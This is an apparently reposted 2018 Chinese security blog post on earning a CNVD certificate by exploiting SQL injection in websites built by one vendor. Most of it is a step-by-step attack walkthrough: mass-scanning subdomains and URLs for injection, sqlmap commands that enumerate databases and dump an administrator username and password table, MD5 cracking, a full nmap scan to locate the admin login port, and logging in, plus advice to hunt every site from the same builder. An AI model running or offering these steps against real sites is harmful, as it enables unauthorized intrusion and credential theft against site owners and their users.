【挖洞思路】从漏洞扫描、获取信息、密码解密到撰写报告,看我如何成功获取CNVD证书! – 作者:开源聚合网安教育

应二哥的邀请,我在这里写一下我拿到cnvd高危漏洞的简单过程,其实过程很简单,只是个简单的sql注入,但重要的是思路,在拿到一个站点的情况下发现通用漏洞不会错过。

先发个证书瞅瞅,CNVD证书是这样的,是由国家计算机网络应急技术处理协调中心联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的信息安全漏洞信息共享知识库。

曹康育-.png

漏洞详细URL(举例)

主链接:

http://www.XXX.com/_tw/index.html

出现漏洞的部分链接:

1.png

操作步骤

以其中一个网站为例

1.打开网站页面

图片1.png

2.复制url :http://www.XXX.com/,将url放在御剑工具左栏,开始ping这个域名,并且开始扫描c类服务器,得到他下面的所有二级域名

图片2.png

3.讲扫出的二级域名导入到桌面上:右键,导出所有的url到桌面上

图片3.png

4.打开超级sql注入工具,讲导出的url导入到工具中

图片4.png

5.点爬行链接,等待爬行完毕,之后点扫描注入,等待结果

图片5.png

6.扫描结果如下:

图片6.png

其中的一个站点就扫出一百多个存在注入漏洞的网站,这些网站很多都可以通过以下方式扫到后台数据,进入到后台页面和数据库,进行数据的任意处理

7.打开sqlmap,输入sqlmap -u “http://www.XXX.com/products_detail.php?id=17&cid=7” –dbs,扫描这个url所有的数据库

图片7.png

结果如下:

图片8.png

8.其中XXX_kun是用户数据的数据库,我们扫描这个数据库的所有表格

语句如下:

sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun --tables

图片9.png图片10.png

9.其中,tcadmin是对方管理员信息所存储的表格,我们扫描这个表格的列,语句如下:

sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun -T tcadmin --columns

图片11.png

结果如下:

图片12.png

10.列名中username,passwd是我们所需的管理员账号密码信息,我们扫描这两个属性,语句如下:

sqlmap -u "http://www.XXX.com/products_detail.php?id=17&cid=7" -D XXX_kun -T tcadmin -C username,passwd --dump

图片13.png

结果如下:

图片14.png

11.将所取的密码经过md5解密,以第一个密码为例:

图片15.png

12.现在我们已经取得后台管理员账号密码,我们用nmap工具扫描后台服务器开放的端口,找到后台登录页面

语句如下:

nmap -sT -sU -sV -O -P0 -p 1-65535 www.XXX.com

恕不能公布对方服务器开放端口,我们在页面http://www.XXX.com后将查到的端口放在url后测试,最终http://www.XXX.com:2096跳转到对方后台服务器登录页面

图片16.png

输入查询到的账号密码就可以进入后台进行数据库操作

这个过程其实很简单,但我们要发现一些东西而不是局限于一个站的简单漏洞,当我们扫描到一个站的漏洞之后尝试去寻找一下首页尾的Power By XXXXX这一句话,后面的XXXXX一般是网站的制作方,一般情况下,制作方下的所有站点都有这种漏洞,如果没有的话可以去他子站下找,总会有所收获。当你发现这一制作方旗下站点有这种漏洞的话,恭喜你,通用漏洞找到了。

接下来就是填写cnvd报告的阶段了。

图片17.png图片18.png

填写报告其实很简单,务必详尽实际准确就没问题,上传附件时上传三到五个站的漏洞情况。最后祝愿大家学习进步,工作顺利。谢谢大家。

本文仅做安全学习研究,切勿用于非法用途

qrcode_for_gh_489aa9dc41ac_1280.jpg

来源:freebuf.com 2018-06-05 15:37:03 by: 开源聚合网安教育

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论